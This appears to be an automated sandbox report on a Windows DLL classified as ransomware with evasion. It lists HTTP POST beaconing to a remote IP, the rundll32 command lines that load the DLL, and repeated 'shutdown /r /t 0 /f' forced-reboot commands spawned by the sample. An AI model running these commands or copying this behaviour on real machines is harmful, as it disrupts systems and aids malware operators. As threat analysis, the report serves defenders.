36 31 39 36 62 37 30 61 35 34 36 30 32 33 65 37 36 39 62 32 31 65 63 33 33 31 63 35 62 33 38 32 34 30 31 33 33 31 62 34 37 37 32 37 30 36 38 33 35 64 66 33 64 35 61 33 64 31 32 31 35 34 66 35 38 38 38 34 33 32 66 31 63 66 36 33 66 64 35 39 64 64 62 38 39 65 31 31 65 64 31 30 31 63 65 31 66 38 33 31 30 62 32 33 32 38 30 63 33 39 32 34 61 37 31 37 32 36 66 31 37 34 35 64 37 32 61 38 65 63 64 62 61 62 39 37 39 64 32 33 37 63 34 32 31 63 33 66 65 36 33 34 35 64 64 61 37 62 33 62 34 34 30 30 38 32 65 31 62 30 32 62 31 65 35 66 65 36 64 61 33 30 31 38 63 30 64 63 35 38 62 62 32 64 34 61 64 31 38 64 35 38 37 66 63 61 64 30 32 38 31 37 36 35 66 31 Data Ascii: 8308e0536daf5c8edd59fe3430214dffbfade4515a4a895844ec0c8edf1a11a7b48ace4bbacfc0257956dcf828b6e30489e1e85b5d91d65f09ae69f761aef2bc3ed09b26fed127f80cfa99980d36258fbab66664065133ad253be6d1620b8c994ffc9585c3e7a43250ea240a3ee8b77a139933174a068df3c0e02625f2c9ea38b41069a6526a470b65a5afdf8acd4d24eed675699390229b9f54e5a2846dbd39a820c0f2e1ac188bd8bd1e147c8d6189ac30040844cc688fe37acd02bb1927cfd9f564eadb689415f4ba2e71b27f77c2a8f2e77b0dbaa87ce05d4cf7f71eaf7138dd635198529eac145e57ea57752c03e3b5f0c8ff0f65bdf0af8b6196b70a546023e769b21ec331c5b382401331b4772706835df3d5a3d12154f5888432f1cf63fd59ddb89e
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 188.166.28.204
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00416896 socket,setsockopt,setsockopt,connect,send,select,recv,closesocket,6_2_00416896
Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 0
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/index.php/comments/feed/
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/index.php/feed/
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/index.php/wp-json/
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/index.php/wp-json/wp/v2/pages/11
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-content/fonts/62c4ddbcb96bbc1fdd12fc552005f3cc.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-content/themes/vw-transport-cargo/assets/css/animate.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-content/themes/vw-transport-cargo/assets/css/blocks.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-content/themes/vw-transport-cargo/assets/css/bootstrap.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-content/themes/vw-transport-cargo/assets/css/fontawesome-all.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-content/themes/vw-transport-cargo/inc/block-patterns/css/block-frontend.css
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-content/themes/vw-transport-cargo/style.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-includes/css/dashicons.min.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-includes/css/dist/block-library/style.min.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/

System Summary

barindex
Uses shutdown.exe to shutdown or reboot the system
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7904 -s 80
Source: BJtPlI.dllStatic PE information: Number of sections : 11 > 10
Source: BJtPlI.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: classification engineClassification label: mal100.rans.evad.winDLL@47/0@0/2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_004203B1 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,6_2_004203B1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0041DC40 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,CloseHandle,6_2_0041DC40
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6860
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7904
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6852
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5888
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\e5bd5825-cdb0-44e5-a3f9-d2328dfe9957Jump to behavior
Source: BJtPlI.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8
Source: BJtPlI.dllVirustotal: Detection: 65%
Source: BJtPlI.dllReversingLabs: Detection: 68%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\BJtPlI.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7904 -s 80
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 80
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6852 -s 80
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 80
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",cmlPc6dI8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7904 -s 80Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /fJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: shutdownext.dllJump to behavior
Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: shutdownext.dllJump to behavior
Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: shutdownext.dllJump to behavior
Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: sspicli.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: BJtPlI.dllStatic PE information: Image base 0x683c0000 > 0x60000000
Source: BJtPlI.dllStatic PE information: real checksum: 0x462e0 should be: 0x38a4b
Source: BJtPlI.dllStatic PE information: section name: .eh_fram
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0042732E push cs; iretd 6_2_0042733A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0042C3F8 push eax; iretd 6_2_0042C3F9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0042CDC1 push eax; ret 6_2_0042CDC4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0042CD85 push ebx; ret 6_2_0042CD91
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
